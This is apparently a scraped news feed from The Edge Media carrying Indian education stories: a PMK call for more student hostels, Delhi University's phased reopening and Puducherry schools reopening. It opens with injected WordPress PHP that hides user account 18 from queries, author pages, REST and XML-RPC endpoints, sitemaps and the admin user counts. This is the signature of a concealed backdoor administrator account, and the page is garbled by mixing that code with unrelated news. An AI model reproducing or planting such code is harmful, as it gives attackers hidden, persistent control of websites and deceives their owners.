add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post PMK demands for more hostel facilities for students appeared first on The Edge Media.
]]>During the past eight years, the number of arts and science colleges have more than doubled from 69 in 2013 to 143 at present, the party founder leader S Ramadoss said. The number of hostels was not however increased correspondingly, he said, batting for more hostels.
While many new institutions are in rural areas, the hostels are mostly in urban regions. Though some hostels are located close to colleges, a rule however barred students from getting admitted to hostels if the location of colleges and hostels fell under separate revenue districts, though these two centres could be located relatively closer, he said.
Despite the fact that students of a government run college at Perumbakkam here may stay in a state run hostel in Guindy area, hostel administration does not allow students of that college stating that their institution fell under Chengelpet district. “It would take at least three hours to travel between Perumbakkam college and Chengelpet hostel. This is not possible.”
There are several vacancies in hostels across Tamil Nadu and if the government relaxed the rule on district borders for admission purposes and announced that students of any government college may join any state-run hostel, about “70 per cent of the problem can be solved,” he said in a statement.
Admission to arts and science courses in government colleges are in full swing and about 90 per cent of seats have been filled and the remaining seats are also expected to be filled soon.
Though students are happy that they have got admission to courses of their choice, those who have not got hostel admission are disappointed, the PMK leader said.
(Except for the headline, this story has not been edited by The Edge Media staff and is published from a syndicated feed.)
The post PMK demands for more hostel facilities for students appeared first on The Edge Media.
]]>The post The VC of Delhi University Says that Colleges will be Reopened in Stages appeared first on The Edge Media.
]]>The VC further stated that a final decision on the phased reopening would be made in the following five to six days because the university needs to plan how to accommodate students from other states in the hostels.
He further stated that the university would ensure that students who intend to attend classes in the offline mode are vaccinated and that the vaccination of DU faculty is nearly complete.
The post The VC of Delhi University Says that Colleges will be Reopened in Stages appeared first on The Edge Media.
]]>The post Colleges and schools to reopen in Puducherry from July 16 appeared first on The Edge Media.
]]>Government-run and privately managed colleges in Puducherry were earlier directed to conduct classes only online following the rise in number of coronavirus cases in the Union Territory. The classes would be held six days a week (Monday to Saturday).
On March 11, the Governor approved a proposal to declare the students of Classes 1 to 9 in the Union Territory as ‘all pass’ this academic year.
The students of Class 10 and Class 11 in Puducherry and Karaikal will be declared ‘all pass’ as per guidelines of the Tamil Nadu Board.
Similarly, students of Classes 10 and 11 in the Mahe and Yanam regions would be promoted as per the guidelines of the Boards of Education in Kerala and Andhra Pradesh respectively said a Raj Nivas release.
As the Covid cases are declining in the country, several states including Bihar and Haryana have announced resuming classes in offline mode. However, while announcing the reopening of schools and colleges, these states have also said that attendance will not be mandatory and Covid protocols will be followed.
The post Colleges and schools to reopen in Puducherry from July 16 appeared first on The Edge Media.
]]>